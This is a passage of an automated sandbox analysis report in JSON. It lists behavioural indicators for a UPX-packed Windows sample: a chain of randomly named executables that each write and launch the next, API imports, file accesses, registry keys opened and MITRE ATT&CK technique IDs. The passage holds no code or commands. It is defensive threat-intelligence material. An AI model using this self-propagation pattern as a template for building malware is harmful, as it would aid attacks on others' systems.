\"15001600c03eab6b@ADVAPI32.dll\"\n \"0e000f00703fab6b@ADVAPI32.dll\"\n \"0e000f00cc3fab6b@ADVAPI32.dll\"\n \"11001200b447ab6b@ADVAPI32.dll\"\n \"110012004848ab6b@ADVAPI32.dll\"\n \"120013008c48ab6b@ADVAPI32.dll\"\n \"12001300e448ab6b@ADVAPI32.dll\"\n \"14001500386eab6b@ADVAPI32.dll\"\n \"14001500506eab6b@ADVAPI32.dll\"\n \"14001500686eab6b@ADVAPI32.dll\"\n \"17001800806eab6b@ADVAPI32.dll\"\n \"0d000e00986eab6b@ADVAPI32.dll\"\n \"11001200a86eab6b@ADVAPI32.dll\"\n \"11001200bc6eab6b@ADVAPI32.dll\"\n \"0f001000fc6fab6b@ADVAPI32.dll\"\n \"140015003c70ab6b@ADVAPI32.dll\"\n \"140015005470ab6b@ADVAPI32.dll\"\n \"0c000d009c70ab6b@ADVAPI32.dll\"\n \"0c000d00ac70ab6b@ADVAPI32.dll\"\n \"0e000f00bc70ab6b@ADVAPI32.dll\"\n \"0e000f00cc70ab6b@ADVAPI32.dll\"\n \"0b000c00dc70ab6b@ADVAPI32.dll\"\n \"180019001473ab6b@RPCRT4.dll\"\n \"130014004073ab6b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"dhxhp.exe\" (UID: 00000000-00005988)\n Spawned process \"lnvjpll.exe\" (UID: 00000000-00005940)\n Spawned process \"0020002.exe\" (UID: 00000000-00005896)\n Spawned process \"802862.exe\" (UID: 00000000-00004124)\n Spawned process \"824686.exe\" (UID: 00000000-00004400)\n Spawned process \"0228060.exe\" (UID: 00000000-00004128)\n Spawned process \"4404242.exe\" (UID: 00000000-00006140)\n Spawned process \"dvrdf.exe\" (UID: 00000000-00004308)\n Spawned process \"nrdphjv.exe\" (UID: 00000000-00004324)\n Spawned process \"rpbpdxh.exe\" (UID: 00000000-00004168)\n Spawned process \"408802.exe\" (UID: 00000000-00002508)\n Spawned process \"6644862.exe\" (UID: 00000000-00003396)\n Spawned process \"848862.exe\" (UID: 00000000-00004200)\n Spawned process \"22202.exe\" (UID: 00000000-00004260)\n Spawned process \"lvlfrln.exe\" (UID: 00000000-00004192)\n Spawned process \"vrdnrx.exe\" (UID: 00000000-00003912)\n Spawned process \"6248060.exe\" (UID: 00000000-00004348)\n Spawned process \"062080.exe\" (UID: 00000000-00002560)\n Spawned process \"086880.exe\" (UID: 00000000-00002780)\n Spawned process \"4424228.exe\" (UID: 00000000-00003840)\n Spawned process \"42866.exe\" (UID: 00000000-00003768)\n Spawned process \"600468.exe\" (UID: 00000000-00002532)\n Spawned process \"66206.exe\" (UID: 00000000-00004236)\n Spawned process \"280282.exe\" (UID: 00000000-00004496)\n Spawned process \"0488840.exe\" (UID: 00000000-00002820)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" was detected as \"UPX\" and name: \"Packer\"\n \"2824064.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"686826.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4460482.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"60026.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0628066.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"422622.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4284246.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xdfpfx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rhvphd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xltnrpf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vlrlrxl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bdjjvlh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4060084.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"084822.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jhftx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4602048.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"822462.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"8024206.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"664222.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"6264048.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"666086.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"thbfpv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ttnbl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ptfff.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"rpbpdxh.exe\" called \"CreateProcessA\" with parameter \"c:\\408802.exe\" - (UID: 00000000-00004168)\n \"4424228.exe\" called \"CreateProcessA\" with parameter \"c:\\42866.exe\" - (UID: 00000000-00003840)\n \"288226.exe\" called \"CreateProcessA\" with parameter \"c:\\08246.exe\" - (UID: 00000000-00002228)\n \"dhfjp.exe\" called \"CreateProcessA\" with parameter \"c:\\jxbtp.exe\" - (UID: 00000000-00003712)\n \"bjjnnr.exe\" called \"CreateProcessA\" with parameter \"c:\\jplfnb.exe\" - (UID: 00000000-00004524)\n \"xrfrdxf.exe\" called \"CreateProcessA\" with parameter \"c:\\brbjvx.exe\" - (UID: 00000000-00001440)\n \"664222.exe\" called \"CreateProcessA\" with parameter \"c:\\8024206.exe\" - (UID: 00000000-00003580)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has an executable section named \"UPX0\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has an executable section named \"UPX1\"\n \"2824064.exe\" has an executable section named \"UPX0\"\n \"2824064.exe\" has an executable section named \"UPX1\"\n \"686826.exe\" has an executable section named \"UPX0\"\n \"686826.exe\" has an executable section named \"UPX1\"\n \"4460482.exe\" has an executable section named \"UPX0\"\n \"4460482.exe\" has an executable section named \"UPX1\"\n \"60026.exe\" has an executable section named \"UPX0\"\n \"60026.exe\" has an executable section named \"UPX1\"\n \"0628066.exe\" has an executable section named \"UPX0\"\n \"0628066.exe\" has an executable section named \"UPX1\"\n \"422622.exe\" has an executable section named \"UPX0\"\n \"422622.exe\" has an executable section named \"UPX1\"\n \"4284246.exe\" has an executable section named \"UPX0\"\n \"4284246.exe\" has an executable section named \"UPX1\"\n \"xdfpfx.exe\" has an executable section named \"UPX0\"\n \"xdfpfx.exe\" has an executable section named \"UPX1\"\n \"rhvphd.exe\" has an executable section named \"UPX0\"\n \"rhvphd.exe\" has an executable section named \"UPX1\"\n \"xltnrpf.exe\" has an executable section named \"UPX0\"\n \"xltnrpf.exe\" has an executable section named \"UPX1\"\n \"vlrlrxl.exe\" has an executable section named \"UPX0\"\n \"vlrlrxl.exe\" has an executable section named \"UPX1\"\n \"bdjjvlh.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has an writable section named \"UPX0\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has an writable section named \"UPX1\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has an writable section named \"UPX2\"\n \"2824064.exe\" has an writable section named \"UPX0\"\n \"2824064.exe\" has an writable section named \"UPX1\"\n \"2824064.exe\" has an writable section named \"UPX2\"\n \"686826.exe\" has an writable section named \"UPX0\"\n \"686826.exe\" has an writable section named \"UPX1\"\n \"686826.exe\" has an writable section named \"UPX2\"\n \"4460482.exe\" has an writable section named \"UPX0\"\n \"4460482.exe\" has an writable section named \"UPX1\"\n \"4460482.exe\" has an writable section named \"UPX2\"\n \"60026.exe\" has an writable section named \"UPX0\"\n \"60026.exe\" has an writable section named \"UPX1\"\n \"60026.exe\" has an writable section named \"UPX2\"\n \"0628066.exe\" has an writable section named \"UPX0\"\n \"0628066.exe\" has an writable section named \"UPX1\"\n \"0628066.exe\" has an writable section named \"UPX2\"\n \"422622.exe\" has an writable section named \"UPX0\"\n \"422622.exe\" has an writable section named \"UPX1\"\n \"422622.exe\" has an writable section named \"UPX2\"\n \"4284246.exe\" has an writable section named \"UPX0\"\n \"4284246.exe\" has an writable section named \"UPX1\"\n \"4284246.exe\" has an writable section named \"UPX2\"\n \"xdfpfx.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2824064.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"686826.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4460482.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"60026.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0628066.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"422622.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4284246.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xdfpfx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rhvphd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xltnrpf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vlrlrxl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bdjjvlh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4060084.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"084822.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jhftx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4602048.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"822462.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"8024206.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"664222.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"6264048.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"666086.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"thbfpv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ttnbl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ptfff.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"dhxhp.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"dhxhp.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"dhxhp.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"dhxhp.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"dhxhp.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"dhxhp.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" reads file \"c:\\4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" reads file \"c:\\dhxhp.exe\"\n \"dhxhp.exe\" reads file \"c:\\dhxhp.exe\"\n \"dhxhp.exe\" reads file \"c:\\lnvjpll.exe\"\n \"lnvjpll.exe\" reads file \"c:\\lnvjpll.exe\"\n \"lnvjpll.exe\" reads file \"c:\\0020002.exe\"\n \"0020002.exe\" reads file \"c:\\0020002.exe\"\n \"0020002.exe\" reads file \"c:\\802862.exe\"\n \"802862.exe\" reads file \"c:\\802862.exe\"\n \"802862.exe\" reads file \"c:\\824686.exe\"\n \"824686.exe\" reads file \"c:\\824686.exe\"\n \"824686.exe\" reads file \"c:\\0228060.exe\"\n \"0228060.exe\" reads file \"c:\\0228060.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"c:\\dhxhp.exe\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"dhxhp.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lnvjpll.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"0020002.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"802862.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"824686.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"0228060.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"4404242.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"dvrdf.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"nrdphjv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rpbpdxh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"408802.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"6644862.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dhxhp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lnvjpll.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0020002.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"802862.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"824686.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0228060.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4404242.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dvrdf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nrdphjv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rpbpdxh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"408802.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6644862.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"848862.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"22202.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lvlfrln.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vrdnrx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6248060.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"062080.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"086880.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4424228.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"42866.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"600468.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"66206.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"280282.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" writes file \"c:\\dhxhp.exe\"\n \"dhxhp.exe\" writes file \"c:\\lnvjpll.exe\"\n \"lnvjpll.exe\" writes file \"c:\\0020002.exe\"\n \"0020002.exe\" writes file \"c:\\802862.exe\"\n \"802862.exe\" writes file \"c:\\824686.exe\"\n \"824686.exe\" writes file \"c:\\0228060.exe\"\n \"0228060.exe\" writes file \"c:\\4404242.exe\"\n \"4404242.exe\" writes file \"c:\\dvrdf.exe\"\n \"dvrdf.exe\" writes file 